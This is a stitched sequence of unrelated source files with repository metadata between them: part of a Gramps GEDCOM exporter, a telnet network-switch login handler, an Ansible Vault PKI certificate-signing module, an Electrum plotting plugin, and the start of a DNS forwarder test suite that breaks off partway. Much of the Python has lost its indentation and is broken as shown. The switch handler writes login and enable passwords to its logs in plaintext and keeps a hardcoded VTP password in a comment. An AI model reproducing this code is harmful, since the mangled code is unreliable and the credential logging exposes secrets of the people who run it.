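    #     2 DATE EST 12 JAN 1900           with a quality prefix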
def _person_name(self, name, attr_nick):
"""
n NAME <NAME_PERSONAL> {1:1}
+1 NPFX <NAME_PIECE_PREFIX> {0:1}
+1 GIVN <NAME_PIECE_GIVEN> {0:1}
+1 NICK <NAME_PIECE_NICKNAME> {0:1}
+1 SPFX <NAME_PIECE_SURNAME_PREFIX {0:1}
+1 SURN <NAME_PIECE_SURNAME> {0:1}
+1 NSFX <NAME_PIECE_SUFFIX> {0:1}
+1 <<SOURCE_CITATION>> {0:M}
+1 <<NOTE_STRUCTURE>> {0:M}
"""
gedcom_name = name.get_gedcom_name()
firstname = name.get_first_name().strip()
surns = []
surprefs = []
for surn in name.get_surname_list():
surns.append(surn.get_surname().replace('/', '?'))
if surn.get_connector():
                # we store the connector with the surname
surns[-1] = surns[-1] + ' ' + surn.get_connector()
surprefs.append(surn.get_prefix().replace('/', '?'))
surname = ', '.join(surns)
surprefix = ', '.join(surprefs)
suffix = name.get_suffix()
title = name.get_title()
nick = name.get_nick_name()
if nick.strip() == '':
nick = attr_nick
self._writeln(1, 'NAME', gedcom_name)
if int(name.get_type()) == NameType.BIRTH:
pass
elif int(name.get_type()) == NameType.MARRIED:
self._writeln(2, 'TYPE', 'married')
elif int(name.get_type()) == NameType.AKA:
self._writeln(2, 'TYPE', 'aka')
else:
self._writeln(2, 'TYPE', name.get_type().xml_str())
if firstname:
self._writeln(2, 'GIVN', firstname)
if surprefix:
self._writeln(2, 'SPFX', surprefix)
if surname:
self._writeln(2, 'SURN', surname)
if name.get_suffix():
self._writeln(2, 'NSFX', suffix)
if name.get_title():
self._writeln(2, 'NPFX', title)
if nick:
self._writeln(2, 'NICK', nick)
self._source_references(name.get_citation_list(), 2)
self._note_references(name.get_note_list(), 2)
def _source_ref_record(self, level, citation_handle):
"""
n SOUR @<XREF:SOUR>@ /* pointer to source record */ {1:1}
+1 PAGE <WHERE_WITHIN_SOURCE> {0:1}
+1 EVEN <EVENT_TYPE_CITED_FROM> {0:1}
+2 ROLE <ROLE_IN_EVENT> {0:1}
+1 DATA {0:1}
+2 DATE <ENTRY_RECORDING_DATE> {0:1}
+2 TEXT <TEXT_FROM_SOURCE> {0:M}
+3 [ CONC | CONT ] <TEXT_FROM_SOURCE> {0:M}
+1 QUAY <CERTAINTY_ASSESSMENT> {0:1}
+1 <<MULTIMEDIA_LINK>> {0:M} ,*
+1 <<NOTE_STRUCTURE>> {0:M}
"""
citation = self.dbase.get_citation_from_handle(citation_handle)
src_handle = citation.get_reference_handle()
if src_handle is None:
return
src = self.dbase.get_source_from_handle(src_handle)
if src is None:
return
# Reference to the source
self._writeln(level, "SOUR", "@%s@" % src.get_gramps_id())
if citation.get_page() != "":
            # PAGE <WHERE_WITHIN_SOURCE> cannot have CONC lines.
            # WHERE_WITHIN_SOURCE:= {Size=1:248}
            # Truncate the value to 248 characters and set limit to 248
            # so the line is never split.
self._writeln(level + 1, 'PAGE', citation.get_page()[0:248],
limit=248)
conf = min(citation.get_confidence_level(),
Citation.CONF_VERY_HIGH)
if conf != Citation.CONF_NORMAL and conf != -1:
self._writeln(level + 1, "QUAY", QUALITY_MAP[conf])
if not citation.get_date_object().is_empty():
self._writeln(level + 1, 'DATA')
self._date(level + 2, citation.get_date_object())
if len(citation.get_note_list()) > 0:
note_list = [self.dbase.get_note_from_handle(h)
for h in citation.get_note_list()]
note_list = [n for n in note_list
if n.get_type() == NoteType.SOURCE_TEXT]
if note_list:
ref_text = note_list[0].get()
else:
ref_text = ""
if ref_text != "" and citation.get_date_object().is_empty():
self._writeln(level + 1, 'DATA')
if ref_text != "":
self._writeln(level + 2, "TEXT", ref_text)
note_list = [self.dbase.get_note_from_handle(h)
for h in citation.get_note_list()]
note_list = [n.handle for n in note_list
if n and n.get_type() != NoteType.SOURCE_TEXT]
self._note_references(note_list, level + 1)
self._photos(citation.get_media_list(), level + 1)
even = None
for srcattr in citation.get_attribute_list():
if str(srcattr.type) == "EVEN":
even = srcattr.value
self._writeln(level + 1, "EVEN", even)
break
if even:
for srcattr in citation.get_attribute_list():
if str(srcattr.type) == "EVEN:ROLE":
self._writeln(level + 2, "ROLE", srcattr.value)
break
def _photo(self, photo, level):
"""
n OBJE {1:1}
+1 FORM <MULTIMEDIA_FORMAT> {1:1}
+1 TITL <DESCRIPTIVE_TITLE> {0:1}
+1 FILE <MULTIMEDIA_FILE_REFERENCE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
"""
photo_obj_id = photo.get_reference_handle()
photo_obj = self.dbase.get_media_from_handle(photo_obj_id)
if photo_obj:
mime = photo_obj.get_mime_type()
form = MIME2GED.get(mime, mime)
path = media_path_full(self.dbase, photo_obj.get_path())
if not os.path.isfile(path):
return
self._writeln(level, 'OBJE')
if form:
self._writeln(level + 1, 'FORM', form)
self._writeln(level + 1, 'TITL', photo_obj.get_description())
self._writeln(level + 1, 'FILE', path, limit=255)
self._note_references(photo_obj.get_note_list(), level + 1)
def _place(self, place, dateobj, level):
"""
PLACE_STRUCTURE:=
n PLAC <PLACE_NAME> {1:1}
+1 FORM <PLACE_HIERARCHY> {0:1}
+1 FONE <PLACE_PHONETIC_VARIATION> {0:M} # not used
+2 TYPE <PHONETIC_TYPE> {1:1}
+1 ROMN <PLACE_ROMANIZED_VARIATION> {0:M} # not used
+2 TYPE <ROMANIZED_TYPE> {1:1}
+1 MAP {0:1}
+2 LATI <PLACE_LATITUDE> {1:1}
+2 LONG <PLACE_LONGITUDE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
"""
if place is None:
return
place_name = _pd.display(self.dbase, place, dateobj)
self._writeln(level, "PLAC", place_name.replace('\r', ' '), limit=120)
longitude = place.get_longitude()
latitude = place.get_latitude()
if longitude and latitude:
(latitude, longitude) = conv_lat_lon(latitude, longitude, "GEDCOM")
if longitude and latitude:
self._writeln(level + 1, "MAP")
self._writeln(level + 2, 'LATI', latitude)
self._writeln(level + 2, 'LONG', longitude)
# The Gedcom standard shows that an optional address structure can
# be written out in the event detail.
# http://homepages.rootsweb.com/~pmcbride/gedcom/55gcch2.htm#EVENT_DETAIL
location = get_main_location(self.dbase, place)
street = location.get(PlaceType.STREET)
locality = location.get(PlaceType.LOCALITY)
city = location.get(PlaceType.CITY)
state = location.get(PlaceType.STATE)
country = location.get(PlaceType.COUNTRY)
postal_code = place.get_code()
if street or locality or city or state or postal_code or country:
self._writeln(level, "ADDR", street)
if street:
self._writeln(level + 1, 'ADR1', street)
if locality:
self._writeln(level + 1, 'ADR2', locality)
if city:
self._writeln(level + 1, 'CITY', city)
if state:
self._writeln(level + 1, 'STAE', state)
if postal_code:
self._writeln(level + 1, 'POST', postal_code)
if country:
self._writeln(level + 1, 'CTRY', country)
self._note_references(place.get_note_list(), level + 1)
def __write_addr(self, level, addr):
"""
n ADDR <ADDRESS_LINE> {0:1}
+1 CONT <ADDRESS_LINE> {0:M}
+1 ADR1 <ADDRESS_LINE1> {0:1} (Street)
+1 ADR2 <ADDRESS_LINE2> {0:1} (Locality)
+1 CITY <ADDRESS_CITY> {0:1}
+1 STAE <ADDRESS_STATE> {0:1}
+1 POST <ADDRESS_POSTAL_CODE> {0:1}
+1 CTRY <ADDRESS_COUNTRY> {0:1}
This is done along the lines suggested by Tamura Jones in
http://www.tamurajones.net/GEDCOMADDR.xhtml as a result of bug 6382.
"GEDCOM writers should always use the structured address format,
        and use it for all addresses, including the submitter address and
their own corporate address." "Vendors that want their product to pass
even the strictest GEDCOM validation, should include export to the old
free-form format..." [This goes on to say the free-form should be an
option, but we have not made it an option in Gramps].
@param level: The level number for the ADDR tag
@type level: Integer
@param addr: The location or address
@type addr: [a super-type of] LocationBase
"""
if addr.get_street() or addr.get_locality() or addr.get_city() or \
                addr.get_state() or addr.get_postal_code() or addr.get_country():
self._writeln(level, 'ADDR', addr.get_street())
if addr.get_locality():
self._writeln(level + 1, 'CONT', addr.get_locality())
if addr.get_city():
self._writeln(level + 1, 'CONT', addr.get_city())
if addr.get_state():
self._writeln(level + 1, 'CONT', addr.get_state())
if addr.get_postal_code():
self._writeln(level + 1, 'CONT', addr.get_postal_code())
if addr.get_country():
self._writeln(level + 1, 'CONT', addr.get_country())
if addr.get_street():
self._writeln(level + 1, 'ADR1', addr.get_street())
if addr.get_locality():
self._writeln(level + 1, 'ADR2', addr.get_locality())
if addr.get_city():
self._writeln(level + 1, 'CITY', addr.get_city())
if addr.get_state():
self._writeln(level + 1, 'STAE', addr.get_state())
if addr.get_postal_code():
self._writeln(level + 1, 'POST', addr.get_postal_code())
if addr.get_country():
self._writeln(level + 1, 'CTRY', addr.get_country())
#-------------------------------------------------------------------------
#
#
#
#-------------------------------------------------------------------------
def export_data(database, filename, user, option_box=None):
"""
External interface used to register with the plugin system.
"""
ret = False
try:
ged_write = GedcomWriter(database, user, option_box)
ret = ged_write.write_gedcom_file(filename)
except IOError as msg:
msg2 = _("Could not create %s") % filename
user.notify_error(msg2, str(msg))
except DatabaseError as msg:
user.notify_db_error("%s\n%s" % (_("GEDCOM Export failed"), str(msg)))
return ret
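# Illustrative only: a minimal sketch of driving the exporter directly.
# "database" and "user" are assumed to be a Gramps database instance and
# a User object; neither is defined in this module.
#
#     ok = export_data(database, "/tmp/family.ged", user)
#     if not ok:
#         print("GEDCOM export failed")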
| gpl-2.0 | -1,091,929,293,636,996,400 | 37.137667 | 81 | 0.520455 | false |
berserkerbernhard/Lidskjalv | code/networkmonitor/modules/misc/switchhandler.py | 1 | 6889 | from modules.lidskjalvloggingtools import loginfo
import telnetlib
import time
WAIT = 5
class SwitchHandler():
def __init__(self, u, p, e):
self.loginpasswords = [p]
self.loginusername = u
self.loginenable = e
self.logintries = 5
self.telnettimeout = 10
def get_switch_name(self, tn):
if tn is None:
raise Exception("NOT A TELNET CONNECTION!!!!!!")
tn.write(b"\n")
RES = str(tn.read_until(b"#", 2))
loginfo(RES)
switchname = RES.split("#")[0].split("\\n")[1]
loginfo("switchname: %s" % switchname)
return switchname
def login_to_switch(self, tn):
if tn is None:
raise Exception("NOT A TELNET CONNECTION",
"in function loginToSwitch!!!!!!")
for loginpassword in self.loginpasswords:
loginfo("Trying password: %s" % (loginpassword))
RES = tn.read_until(b":", 2)
loginfo("Connection read data: %s" % RES)
loginfo(">>>> Sending password: %s" % loginpassword)
tn.write(loginpassword.encode('ascii') + b"\n")
loginfo(">>>> Sending password DONE")
RES = tn.read_until(b":", 2)
loginfo("Connection read data: %s" % RES)
if ">" in str(RES):
loginfo("+++++++++ Logged in !!!!!!!!!!")
return [tn, loginpassword]
return None
def enableSwitch(self, tn):
print(tn)
loginfo("enableSwitch start")
if tn is None:
raise Exception("NOT A TELNET CONNECTION!!!!!!")
tn.write(b"\n")
RES = tn.read_until(b":", 2)
print("RES:", RES)
loginfo("RES: %s" % str(RES))
if "Bad passwords" in str(RES):
print("Try log in again with another password(%s)" %
self.loginenable)
if ">" in str(RES) \
or "Password" in str(RES) \
or "User Access Verification" in str(RES):
loginfo("Ready for enable ...")
t = b"enable\n"
print(t)
tn.write(t)
RES = tn.read_until(b":", 2)
print("RES:", RES)
loginfo("Attempting to log in.")
# mbs
loginfo("Sending enable: %s" % self.loginenable)
print("Sending enable: %s" % self.loginenable)
tn.write(self.loginenable.encode('ascii') + b"\n")
print("login enable sent. Testing for response.")
RES = tn.read_until(b"#", self.telnettimeout)
loginfo(RES)
if "#" in str(RES):
loginfo("We're logged in.")
return tn
else:
loginfo("Still not logged in. :-(")
loginfo("Nothing happended!!! WTF???")
return None
def openTelnetConnection(self, HOST):
print("Try login to host: %s" % HOST)
for thistry in range(self.logintries):
loginfo("Try: %s" % str(thistry + 1))
try:
print(HOST, 23, self.telnettimeout)
tn = telnetlib.Telnet(HOST,
23,
self.telnettimeout)
loginfo("Connection established to %s." % HOST)
return tn
            except Exception:
loginfo("Failed to open connection: %s" % HOST)
return None
# def setVTPMode(self, tn, HOSTNAME, device):
# tn.write("\r\n")
# tn.read_until("#", WAIT)
# tn.write("\r\n")
# tn.read_until("#", WAIT)
# tn.write("\r\n")
# tn.read_until("#", WAIT)
# tn.write("conf t\r\n")
# resultdata = tn.read_until("#", 5)
# if device == "172.17.128.61":
# print "VTP Server:", device
# tn.write("vtp mode server\r\n")
# else:
# print "VTP Client:", device
# tn.write("vtp mode client\r\n")
# resultdata = tn.read_until("#", 5)
# tn.write("vtp domain VTP-20141209-1\r\n")
# resultdata = tn.read_until("#", 5)
# tn.write("vtp password FSNAAL-VTP\r\n")
# resultdata = tn.read_until("#", 5)
# tn.write("exit\r\n")
# resultdata = tn.read_until("#", 5)
# tn.write("wr\r\n")
# resultdata = tn.read_until("#", 5)
def setTermLen(self, tn):
tn.write(b"terminal length 0\n")
loginfo(tn.read_until(b"#", WAIT))
def get_interfaces(self, tn):
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"sh int\r\n")
r = str(tn.read_until(b"#", self.telnettimeout))
r = "\n".join(r.split("\\r\\n"))
loginfo("Result from show interfaces:\n%s" % r)
return r
def get_cdp_neighbors_detail(self, tn):
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"sh cdp neighbors detail\r\n")
resultdata = tn.read_until(b"#", self.telnettimeout)
return resultdata.decode()
def writeDescriptionToInterface(self, tn, interface, description):
loginfo("1: %s" % tn.read_until(b"#", WAIT))
tn.write(b"conf t\r\n")
loginfo("2: %s" % tn.read_until(b"#", WAIT))
sendstring = "int %s\r\n" % interface
tn.write(sendstring.encode())
loginfo(tn.read_until(b"#", WAIT))
loginfo("3: %s" % tn.read_until(b"#", WAIT))
sendstring = "description %s %s\r\n" % (description, time.ctime())
tn.write(sendstring.encode())
loginfo(tn.read_until(b"#", WAIT))
loginfo("4: %s" % tn.read_until(b"#", WAIT))
tn.write(b"exit\r\n")
loginfo("5: %s" % tn.read_until(b"#", WAIT))
tn.write(b"exit\r\n")
loginfo("6: %s" % tn.read_until(b"#", WAIT))
tn.write(b"wr\r\n")
loginfo(tn.read_until(b"#", WAIT))
def showRunningConfig(self, tn):
tn.read_until(b"#", WAIT)
tn.write(b"sh run\r\n")
r = tn.read_until(b"#", WAIT)
r = str(r)
r = r.replace("\\r\\n", "\n")
# print(r)
return r
    def addDescriptionToAllTrunkInterfaces(self, tn):
        # Parse raw "show cdp neighbors detail" text (Cisco-style field
        # labels assumed) into [device, interface, platform] triples.
        raw = self.get_cdp_neighbors_detail(tn)
        neighbors = []
        device = platform = ""
        for line in raw.splitlines():
            if line.startswith("Device ID:"):
                device = line.split(":", 1)[1].strip()
            elif line.startswith("Platform:"):
                platform = line.split(":", 1)[1].split(",")[0].strip()
            elif line.startswith("Interface:"):
                interface = line.split(":", 1)[1].split(",")[0].strip()
                neighbors.append([device, interface, platform])
        for neighbor in neighbors:
            if neighbor != ["", "", ""]:
                self.writeDescriptionToInterface(tn,
                                                 neighbor[1],
                                                 "%s %s" % (neighbor[0],
                                                            neighbor[2]))
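# Illustrative only: a minimal driver for SwitchHandler. The address and
# credentials below are placeholders, not part of Lidskjalv.
if __name__ == "__main__":
    handler = SwitchHandler("admin", "password", "enablesecret")
    conn = handler.openTelnetConnection("192.0.2.10")
    if conn is not None:
        login = handler.login_to_switch(conn)
        if login is not None:
            switch = handler.enableSwitch(login[0])
            if switch is not None:
                handler.setTermLen(switch)
                print(handler.get_switch_name(switch))
                switch.close()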
| gpl-3.0 | 8,448,278,225,030,082,000 | 32.935961 | 74 | 0.497169 | false |
TerryHowe/ansible-modules-hashivault | ansible/modules/hashivault/hashivault_pki_cert_sign.py | 1 | 6865 | #!/usr/bin/env python
from ansible.module_utils.hashivault import hashivault_auth_client
from ansible.module_utils.hashivault import hashivault_argspec
from ansible.module_utils.hashivault import hashivault_init
from ansible.module_utils.hashivault import hashiwrapper
ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.1'}
DOCUMENTATION = r'''
---
module: hashivault_pki_cert_sign
version_added: "4.5.0"
short_description: Hashicorp Vault PKI Sign CSR ( Certificate / Intermediate / Verbatim )
description:
- This module signs a new certificate based upon the provided CSR and the supplied parameters.
options:
csr:
        required: true
description:
- Specifies the PEM-encoded CSR.
role:
description:
- Specifies the name of the role to create.
            - 'For the *verbatim* type, if a role is set, the following parameters from the role take effect: `ttl`, `max_ttl`,
`generate_lease`, and `no_store`.'
common_name:
description:
- Specifies the requested CN for the certificate. If the CN is allowed by role policy, it will be issued.
mount_point:
default: pki
description:
- location where secrets engine is mounted. also known as path
type:
type: str
description:
- Sign a new certificate with `certificate` based upon the provided CSR and the supplied parameters, subject
to the restrictions contained in the role named in the endpoint. The issuing CA certificate is returned as
well, so that only the root CA need be in a client's trust store.
- Use `intermediate` to configure CA certificate to issue a certificate with appropriate values for
acting as an intermediate CA. Distribution points use the values set via config/urls. Values set in the
CSR are ignored unless use_csr_values is set to true, in which case the values from the CSR are used
verbatim.
- Use `verbatim` to sign a new certificate based upon the provided CSR. Values are taken verbatim from the
CSR; the only restriction is that this endpoint will refuse to issue an intermediate CA certificate (use
`intermediate` type for that functionality.)
choices: ["certificate", "intermediate", "verbatim"]
default: certificate
extra_params:
description:
Extra parameters depending on the type.
type: dict
extends_documentation_fragment:
- hashivault
'''
EXAMPLES = r'''
---
- hosts: localhost
tasks:
- hashivault_pki_cert_sign:
role: 'tester'
common_name: 'test.example.com'
register: cert
- debug: msg="{{ cert }}"
'''
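# Illustrative only: a task signing an intermediate CA CSR; the file
# lookup and use_csr_values values below are assumptions, not tested values.
#
#   - hashivault_pki_cert_sign:
#       type: intermediate
#       common_name: 'ca.example.com'
#       csr: "{{ lookup('file', 'intermediate.csr') }}"
#       extra_params:
#         use_csr_values: true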
def main():
argspec = hashivault_argspec()
argspec['csr'] = dict(required=True, type='str')
argspec['role'] = dict(required=False, type='str')
argspec['common_name'] = dict(required=False, type='str')
argspec['extra_params'] = dict(required=False, type='dict', default={})
argspec['mount_point'] = dict(required=False, type='str', default='pki')
argspec['type'] = dict(required=False, type='str', default='certificate', choices=["certificate", "intermediate",
"verbatim"])
module = hashivault_init(argspec)
result = hashivault_pki_cert_sign(module)
if result.get('failed'):
module.fail_json(**result)
else:
module.exit_json(**result)
def certificate(params, mount_point, client):
csr = params.get('csr')
common_name = params.get('common_name')
extra_params = params.get('extra_params')
role = params.get('role').strip('/')
# check if role exists
try:
current_state = client.secrets.pki.read_role(name=role, mount_point=mount_point).get('data')
except Exception:
current_state = {}
if not current_state:
return {'failed': True, 'rc': 1, 'msg': 'role not found or permission denied'}
if not common_name:
return {'failed': True, 'rc': 1, 'msg': 'Missing required options: common_name'}
result = {"changed": False, "rc": 0}
try:
result['data'] = client.secrets.pki.sign_certificate(csr=csr, name=role, mount_point=mount_point,
common_name=common_name,
extra_params=extra_params).get('data')
result['changed'] = True
except Exception as e:
result['rc'] = 1
result['failed'] = True
result['msg'] = u"Exception: " + str(e)
return result
def intermediate(params, mount_point, client):
csr = params.get('csr')
common_name = params.get('common_name')
extra_params = params.get('extra_params')
if not common_name:
return {'failed': True, 'rc': 1, 'msg': 'Missing required options: common_name'}
result = {"changed": False, "rc": 0}
try:
result['data'] = client.secrets.pki.sign_intermediate(csr=csr, common_name=common_name,
extra_params=extra_params,
mount_point=mount_point).get('data')
result['changed'] = True
except Exception as e:
result['rc'] = 1
result['failed'] = True
result['msg'] = u"Exception: " + str(e)
return result
def verbatim(params, mount_point, client):
csr = params.get('csr')
extra_params = params.get('extra_params')
role = params.get('role').strip('/')
# check if role exists
try:
current_state = client.secrets.pki.read_role(name=role, mount_point=mount_point).get('data')
except Exception:
current_state = {}
if not current_state:
return {'failed': True, 'rc': 1, 'msg': 'role not found or permission denied'}
result = {"changed": False, "rc": 0}
try:
result['data'] = client.secrets.pki.sign_verbatim(csr=csr, name=role, extra_params=extra_params,
mount_point=mount_point).get('data')
result['changed'] = True
except Exception as e:
result['rc'] = 1
result['failed'] = True
result['msg'] = u"Exception: " + str(e)
return result
@hashiwrapper
def hashivault_pki_cert_sign(module):
supported_types = {
'certificate': certificate,
'intermediate': intermediate,
'verbatim': verbatim
}
params = module.params
client = hashivault_auth_client(params)
mount_point = params.get('mount_point').strip('/')
return supported_types[params.get('type')](params=params, mount_point=mount_point, client=client)
if __name__ == '__main__':
main()
| mit | -7,423,627,915,068,720,000 | 37.567416 | 120 | 0.606555 | false |
justinvforvendetta/electrum-boli | plugins/plot.py | 1 | 3669 | from PyQt4.QtGui import *
from electrum_boli.plugins import BasePlugin, hook
from electrum_boli.i18n import _
import datetime
from electrum_boli.util import format_satoshis
from electrum_boli.bitcoin import COIN
try:
import matplotlib.pyplot as plt
import matplotlib.dates as md
from matplotlib.patches import Ellipse
from matplotlib.offsetbox import AnchoredOffsetbox, TextArea, DrawingArea, HPacker
flag_matlib=True
except Exception:
flag_matlib=False
class Plugin(BasePlugin):
def is_available(self):
if flag_matlib:
return True
else:
return False
@hook
def init_qt(self, gui):
self.win = gui.main_window
@hook
def export_history_dialog(self, d,hbox):
self.wallet = d.wallet
history = self.wallet.get_history()
if len(history) > 0:
b = QPushButton(_("Preview plot"))
hbox.addWidget(b)
b.clicked.connect(lambda: self.do_plot(self.wallet, history))
else:
b = QPushButton(_("No history to plot"))
hbox.addWidget(b)
def do_plot(self, wallet, history):
balance_Val=[]
fee_val=[]
value_val=[]
datenums=[]
unknown_trans = 0
pending_trans = 0
counter_trans = 0
balance = 0
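        # Illustrative only: each history item is assumed to unpack as
        # (tx_hash, confirmations, value, timestamp, balance), e.g.
        # ("ab12...", 6, -150000, 1423050000, 98500000), with value and
        # balance in satoshis and timestamp as POSIX time.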
for item in history:
tx_hash, confirmations, value, timestamp, balance = item
if confirmations:
if timestamp is not None:
try:
datenums.append(md.date2num(datetime.datetime.fromtimestamp(timestamp)))
balance_Val.append(1000.*balance/COIN)
                except (RuntimeError, TypeError, NameError) as reason:
unknown_trans += 1
pass
else:
unknown_trans += 1
else:
pending_trans += 1
value_val.append(1000.*value/COIN)
if tx_hash:
label, is_default_label = wallet.get_label(tx_hash)
label = label.encode('utf-8')
else:
label = ""
f, axarr = plt.subplots(2, sharex=True)
plt.subplots_adjust(bottom=0.2)
plt.xticks( rotation=25 )
ax=plt.gca()
x=19
test11="Unknown transactions = "+str(unknown_trans)+" Pending transactions = "+str(pending_trans)+" ."
box1 = TextArea(" Test : Number of pending transactions", textprops=dict(color="k"))
box1.set_text(test11)
box = HPacker(children=[box1],
align="center",
pad=0.1, sep=15)
anchored_box = AnchoredOffsetbox(loc=3,
child=box, pad=0.5,
frameon=True,
bbox_to_anchor=(0.5, 1.02),
bbox_transform=ax.transAxes,
borderpad=0.5,
)
ax.add_artist(anchored_box)
plt.ylabel('mBOLI')
plt.xlabel('Dates')
xfmt = md.DateFormatter('%Y-%m-%d')
ax.xaxis.set_major_formatter(xfmt)
axarr[0].plot(datenums,balance_Val,marker='o',linestyle='-',color='blue',label='Balance')
axarr[0].legend(loc='upper left')
axarr[0].set_title('History Transactions')
xfmt = md.DateFormatter('%Y-%m-%d')
ax.xaxis.set_major_formatter(xfmt)
axarr[1].plot(datenums,value_val,marker='o',linestyle='-',color='green',label='Value')
axarr[1].legend(loc='upper left')
# plt.annotate('unknown transaction = %d \n pending transactions = %d' %(unknown_trans,pending_trans),xy=(0.7,0.05),xycoords='axes fraction',size=12)
plt.show()
| gpl-3.0 | -4,475,255,244,508,078,600 | 28.119048 | 156 | 0.562551 | false |
CZ-NIC/deckard | tools/forwarder_check.py | 1 | 18882 | """Test suite for forwarders
Invoke with `python3 -m pytest forwarder_check.py --forwarder [IP of forwarder]`"""
# pylint: disable=C0301,C0111,C0103
# flake8: noqa
import ipaddress
import dns.message
# NOTE silence incorrectly reported error, may be removed once it passes in CI
import pytest # pylint: disable=wrong-import-order
import answer_checker
ALL = {"opcode", "qtype", "qname", "flags", "rcode", "answer", "authority", "additional"}
HEADER = {"opcode", "qtype", "qname", "flags", "rcode"}
VERSION_QUERY = dns.message.make_query("_version.test.knot-resolver.cz", "TXT")
VERSION_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RA RD
;QUESTION
_version.test.knot-resolver.cz. IN TXT
;ANSWER
_version.test.knot-resolver.cz. 3600 IN TXT "1"
;AUTHORITY
;ADDITIONAL
""")
def test_zone_version(forwarder):
return answer_checker.send_and_check(VERSION_QUERY,
VERSION_ANSWER,
forwarder,
ALL - {"additional", "authority"})
SIMPLE_QUERY = answer_checker.make_random_case_query("good-a.test.knot-resolver.cz", "A")
SIMPLE_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA
;QUESTION
good-a.test.knot-resolver.cz. IN A
;ANSWER
good-a.test.knot-resolver.cz. 3600 IN A 217.31.192.130
;AUTHORITY
;ADDITIONAL""")
def test_supports_simple_answers(forwarder, tcp):
return answer_checker.send_and_check(SIMPLE_QUERY,
SIMPLE_ANSWER,
forwarder,
ALL - {"additional", "authority"},
tcp=tcp)
EDNS_QUERY = answer_checker.make_random_case_query("good-a.test.knot-resolver.cz", "A", use_edns=0)
def test_supports_EDNS0(forwarder, tcp):
answer = answer_checker.get_answer(EDNS_QUERY, forwarder, tcp=tcp)
if answer.edns != 0:
raise ValueError("EDNS0 not supported")
DO_QUERY = answer_checker.make_random_case_query("good-a.test.knot-resolver.cz", "A", want_dnssec=True)
def test_supports_DO(forwarder, tcp):
answer = answer_checker.get_answer(DO_QUERY, forwarder, tcp=tcp)
if not answer.flags & dns.flags.DO:
raise ValueError("DO bit sent, but not recieved")
CD_QUERY = answer_checker.make_random_case_query("good-a.test.knot-resolver.cz", "A", want_dnssec=True)
CD_QUERY.flags += dns.flags.CD
def test_supports_CD(forwarder, tcp):
answer = answer_checker.get_answer(CD_QUERY, forwarder, tcp=tcp)
if not answer.flags & dns.flags.CD:
raise ValueError("CD bit sent, but not recieved")
RRSIG_QUERY = answer_checker.make_random_case_query("good-a.test.knot-resolver.cz", "A", want_dnssec=True)
RRSIG_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
good-a.test.knot-resolver.cz. IN A
;ANSWER
good-a.test.knot-resolver.cz. 3600 IN A 217.31.192.130
good-a.test.knot-resolver.cz. 3600 IN RRSIG A 13 4 3600 20370119135450 20190205122450 58 test.knot-resolver.cz. n7BfrYwvRztj8khwefZxnVUSBm6vvIWH 3HGTfswPSUKqNrg6yqMIxm0dpLVPSIna hPnTnP3CP6G4SEfvAGk33w==
;AUTHORITY
;ADDITIONAL""")
def test_returns_RRSIG(forwarder, tcp):
return answer_checker.send_and_check(RRSIG_QUERY,
RRSIG_ANSWER,
forwarder,
HEADER | {"answerrrsigs"},
tcp=tcp)
DNSKEY_QUERY = answer_checker.make_random_case_query("test.knot-resolver.cz", "DNSKEY", want_dnssec=True)
DNSKEY_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
test.knot-resolver.cz. IN DNSKEY
;ANSWER
test.knot-resolver.cz. 3600 IN DNSKEY 256 3 13 b5ZQUzN5iD9ercgxPeeEh9qI8UzazMa6 vo8GCART4iQNzAcsB6xPYVopHKcjyssH MUiDoQgrjVd6hOLWQqnCtg==
test.knot-resolver.cz. 3600 IN DNSKEY 257 3 13 xrbuMAmJy3GlxUF46tJgP64cmExKWQBg iRGeLhfub9x3DV69D+2m1zom+CyqHsYY VDIjYOueGzj/8XFucg1bDw==
test.knot-resolver.cz. 3600 IN RRSIG DNSKEY 13 3 3600 20370119141532 20190205124532 60526 test.knot-resolver.cz. TCJGKcojvwe5cQYJaj+vMS5/lW2xLDVi cABjowFhQ3ttTIfjNINBK1sAJgybmdtd 5GcBlgXOPz+QWRFJUnRU2g==
;AUTHORITY
;ADDITIONAL""")
def test_supports_DNSKEY(forwarder, tcp):
return answer_checker.send_and_check(DNSKEY_QUERY,
DNSKEY_ANSWER,
forwarder,
ALL - {"additional", "authority"},
tcp=tcp)
DS_QUERY = answer_checker.make_random_case_query("test.knot-resolver.cz", "DS", want_dnssec=True)
DS_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
test.knot-resolver.cz. IN DS
;ANSWER
test.knot-resolver.cz. 1800 IN DS 0 8 2 0000000000000baff1ed10ca1beefc0111ded1cedeadadd011c0feecaca0b011
test.knot-resolver.cz. 1800 IN DS 60526 13 2 9E526A3D1D1D3F78BD11ABDCE8DE5A6CF9212CD2575D28FC10EBC046 F001AEA8
test.knot-resolver.cz. 1800 IN RRSIG DS 13 3 1800 20190227092958 20190213075958 23292 knot-resolver.cz. 9yBl60FpEgGt5R5JAKWWK1n1AGLSoeQDsX3nfLz/gQtljhKgnKgkM10T MZKIPUUY9jczh89ChoqCYFr+4MzURw==
;AUTHORITY
;ADDITIONAL""")
# A DS signature with key tag 0 is left dangling in the zone to trigger a bug
# in building the chain of trust in older versions of Unbound
def test_supports_DS(forwarder, tcp):
return answer_checker.send_and_check(DS_QUERY,
DS_ANSWER,
forwarder,
HEADER | {"answerrrsigs"},
tcp=tcp)
NSEC_NEGATIVE_QUERY = answer_checker.make_random_case_query("nonexistent.nsec.test.knot-resolver.cz", "A", want_dnssec=True)
NSEC_NEGATIVE_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NXDOMAIN
